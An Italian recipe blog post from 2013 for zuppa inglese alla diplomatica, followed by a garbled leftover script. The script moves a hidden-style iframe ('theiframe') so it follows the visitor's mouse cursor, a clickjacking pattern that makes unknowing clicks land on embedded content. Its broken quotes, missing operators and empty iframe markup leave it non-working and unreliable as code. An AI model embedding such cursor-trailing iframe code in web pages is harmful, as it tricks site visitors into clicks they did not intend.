giovedì 17 ottobre 2013

Zuppa inglese alla diplomatica

INGREDIENTI PER 8 PERSONE:2 tuorli ,50 gr di zucchero ,1 cucchiaio di farina,2,5 dl di latte,100 gr di cioccolato fondente,1 pan di spagna gia' pronto del diametro di 24 cm ,2 dl di alchemes ,4 dl di panna PER DECORARE:panna montata,cacao,fogli o fiori di cioccolata bianca PREPARAZIONE:Con una frusta a mano ,montate i tuorli a neve con lo zucchero .Incorporate mescolando la farina fatta cadere da un colino a maglie fitte e diluite il composto con il latte in una casseruola,a fuoco bassissimo,mescolando con un cucchiaio di legno per circa 10 min dal momento del bollore.Incorporatevi il cioccolato fuso a bagnomaria e fate raffreddare.Tagliate il pan di spagna a dischi di circa 1 cm il piu' delle volte sono gia' tagliati,diluite l alchermes con 0,5 dl di acqua.Con fruste elettriche ,montate densamente la panna tenetene da parte 2 cucchiai per il decoro e incorporate il resto alla crema fredda.Sul fondo dello stampo adagiate un disco di pan di spagna ,spennellatelo con l alchermes diluito e cospargetelo di crema .Ripetete l operazione fino all esaurimento dei dischi poi coprite lo stampo con una pellicola per alimenti e mettete in frigo per 2 ore Decorate con panna montata spolverizzatela di cacao e completate la decorazione con foglie o fiori di cioccolato bianco .Servite.
text/javascript”> var opacity = 0.5; var time = 0; if((document.getElementById) window.addEventListener || window.attachEvent){ (function(){ var hairCol = “#ff0000″; var d = document; var my = -10; var mx = -10; var r; var vert = “”; var idx = document.getElementsByTagName(‘div’).length; var thehairs = “”; document.write(thehairs); var like = document.getElementById(“theiframe”); document.getElementsByTagName(‘body’)[0].appendChild(like); var pix = “px”; var domWw = (typeof window.innerWidth == “number”); var domSy = (typeof window.pageYOffset == “number”); if (domWw) r = window; else{ if (d.documentElement typeof d.documentElement.clientWidth == “number” d.documentElement.clientWidth != 0) r = d.documentElement; else{ if (d.body typeof d.body.clientWidth == “number”) r = d.body; } } if(time != 0){ setTimeout(function(){ document.getElementsByTagName(‘body’)[0].removeChild(like); if (window.addEventListener){ document.removeEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ document.detachEvent(“onmousemove”,mouse); } }, time); } function scrl(yx){ var y,x; if (domSy){ y = r.pageYOffset; x = r.pageXOffset; } else{ y = r.scrollTop; x = r.scrollLeft; } return (yx == 0) ? y:x; } function mouse(e){ var msy = (domSy)?window.pageYOffset:0; if (!e) e = window.event; if (typeof e.pageY == ‘number’){ my = e.pageY – 5 – msy; mx = e.pageX – 4; } else{ my = e.clientY – 6 – msy; mx = e.clientX – 6; } vert.top = my + scrl(0) + pix; vert.left = mx + pix; } function ani(){ vert.top = my + scrl(0) + pix; setTimeout(ani, 300); } function init(){ vert = document.getElementById(“theiframe”).style; ani(); } if (window.addEventListener){ window.addEventListener(“load”,init,false); document.addEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ window.attachEvent(“onload”,init); document.attachEvent(“onmousemove”,mouse); } })(); }//End. script>